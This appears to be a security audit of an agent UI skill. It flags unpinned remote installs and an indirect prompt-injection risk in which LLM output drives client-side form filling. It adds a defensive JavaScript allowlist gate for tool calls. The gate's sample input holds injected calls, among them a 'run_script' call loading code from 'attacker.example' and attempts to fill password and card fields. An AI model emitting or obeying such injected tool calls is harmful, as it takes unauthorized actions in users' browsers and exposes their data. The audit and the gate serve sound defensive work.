agent-ui
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUM (EXTERNAL_DOWNLOADS, COMMAND_EXECUTION)
Full Analysis
- EXTERNAL_DOWNLOADS (MEDIUM): The skill instructs the user to install a component with 'npx shadcn@latest add https://ui.inference.sh/r/agent.json'. This downloads and executes code from an unverified external domain (inference.sh) that is not on the trusted sources list, with no pinned version ('@latest') and no integrity check on what is fetched.
- COMMAND_EXECUTION (MEDIUM): The skill also suggests running 'npx skills add' for several related components (chat-ui, widgets-ui, tools-ui). Each of these installs runs unverified code from the source repository; if that repository is compromised, the install step itself becomes arbitrary code execution on the developer's machine.
- INDIRECT_PROMPT_INJECTION (LOW): The skill's 'Generative UI' and 'Client-side tools' features render widgets and fill form fields directly from LLM output. Any content the agent ingests can therefore steer those actions, so a malicious or prompt-injected agent response could attempt unauthorized actions in the user's browser.
  - Ingestion points: agent responses, and JSON UI definitions passed through the 'agentConfig' and 'config' props.
  - Boundary markers: none visible in the provided component interface; LLM output flows directly into client-side tool execution.
  - Capability inventory: client-side form filling ('fill_field'), UI scanning ('scan_ui'), and dynamic widget rendering.
  - Sanitization: the documentation does not specify any validation or sanitization of the JSON received from the agent before widgets are rendered or tools are invoked.
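The gap the finding describes (no boundary, no validation between agent JSON and client-side tool execution) is usually closed with an allowlist gate in front of the tool dispatcher. The following is an added example, not code from the agent-ui project or its documentation; the tool names 'fill_field' and 'scan_ui' are the ones the audit lists, while the field registry, widget schema, limits and the shape of the tool-call objects are assumptions made for illustration:

```javascript
// Added example: an allowlist gate between agent output and client-side tools.
// Tool names ('fill_field', 'scan_ui') are from the audit; everything else
// (field ids, widget types, call shape, limits) is a hypothetical for this demo.

const MAX_VALUE_LEN = 256;

// Fields the agent may target, keyed by a stable id instead of a free-form CSS
// selector, so the model cannot aim 'fill_field' at arbitrary DOM nodes.
// Constructed sample; a real app derives this from its own form definitions.
const FIELD_REGISTRY = {
  email:        { label: "Email",        sensitive: false },
  display_name: { label: "Display name", sensitive: false },
  card_number:  { label: "Card number",  sensitive: true }, // never agent-fillable
};

// Widget types the renderer knows, with the exact prop keys each accepts.
const WIDGET_SCHEMA = {
  text:   { props: ["content"] },
  button: { props: ["label", "action"] },
};

const CONTROL_CHARS = /[\u0000-\u0008\u000b\u000c\u000e-\u001f\u007f]/;

function isPlainObject(x) {
  return x !== null && typeof x === "object" && !Array.isArray(x);
}

// Per-tool argument rules. check() returns an error string or null.
const TOOL_RULES = {
  scan_ui: {
    stateChanging: false,
    check(args) {
      // scan_ui takes no arguments; extra keys mean the model is probing.
      return Object.keys(args).length === 0 ? null : "scan_ui takes no arguments";
    },
  },
  fill_field: {
    stateChanging: true,
    check(args) {
      const { field, value, ...rest } = args;
      if (Object.keys(rest).length) return "unexpected keys in fill_field args";
      if (typeof field !== "string" || !(field in FIELD_REGISTRY)) return "unknown field";
      if (FIELD_REGISTRY[field].sensitive) return "field is not agent-fillable";
      if (typeof value !== "string") return "value must be a string";
      if (value.length > MAX_VALUE_LEN) return "value too long";
      if (CONTROL_CHARS.test(value)) return "value contains control characters";
      return null;
    },
  },
};

// Validate one agent-emitted tool call. State-changing tools come back with
// requiresConfirmation=true so the UI asks the user before executing them.
function gateToolCall(raw) {
  if (!isPlainObject(raw)) return { ok: false, reason: "tool call is not an object" };
  const { name, args = {}, ...rest } = raw;
  if (Object.keys(rest).length) return { ok: false, reason: "unexpected top-level keys" };
  const rule = TOOL_RULES[name];
  if (!rule) return { ok: false, reason: `tool not allowlisted: ${String(name)}` };
  if (!isPlainObject(args)) return { ok: false, reason: "args must be an object" };
  const err = rule.check(args);
  if (err) return { ok: false, reason: err };
  return { ok: true, call: { name, args }, requiresConfirmation: rule.stateChanging };
}

// Validate one widget definition from the agent's JSON UI. Unknown widget
// types and undeclared props (e.g. a raw `html` prop) are rejected outright.
function gateWidget(raw) {
  if (!isPlainObject(raw)) return { ok: false, reason: "widget is not an object" };
  const { type, props = {}, ...rest } = raw;
  if (Object.keys(rest).length) return { ok: false, reason: "unexpected top-level keys" };
  const schema = WIDGET_SCHEMA[type];
  if (!schema) return { ok: false, reason: `widget type not allowlisted: ${String(type)}` };
  if (!isPlainObject(props)) return { ok: false, reason: "props must be an object" };
  for (const key of Object.keys(props)) {
    if (!schema.props.includes(key)) return { ok: false, reason: `undeclared prop: ${key}` };
    if (typeof props[key] !== "string") return { ok: false, reason: `prop ${key} must be a string` };
  }
  return { ok: true, widget: { type, props } };
}

// Split a whole agent turn into accepted and rejected calls.
function gateAll(calls) {
  const result = { accepted: [], rejected: [] };
  for (const c of Array.isArray(calls) ? calls : []) {
    const g = gateToolCall(c);
    if (g.ok) result.accepted.push(g);
    else result.rejected.push({ raw: c, reason: g.reason });
  }
  return result;
}

// Constructed sample of what a prompt-injected agent turn might emit.
const SAMPLE_TOOL_CALLS = [
  { name: "scan_ui", args: {} },
  { name: "fill_field", args: { field: "email", value: "alice@example.com" } },
  { name: "fill_field", args: { field: "card_number", value: "4111111111111111" } },
  { name: "fill_field", args: { field: "input[name=password]", value: "hunter2" } },
  { name: "run_script", args: { src: "https://attacker.example/x.js" } },
];
```

Running gateAll(SAMPLE_TOOL_CALLS) accepts the two benign calls and rejects the three injected ones (a sensitive field, a raw selector that is not in the registry, and a tool that does not exist). The point of the design is that the registry and the tool table are the boundary the audit found missing: the model can only name things the application declared in advance, and anything state-changing still needs a user confirmation before it runs.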
Audit Metadata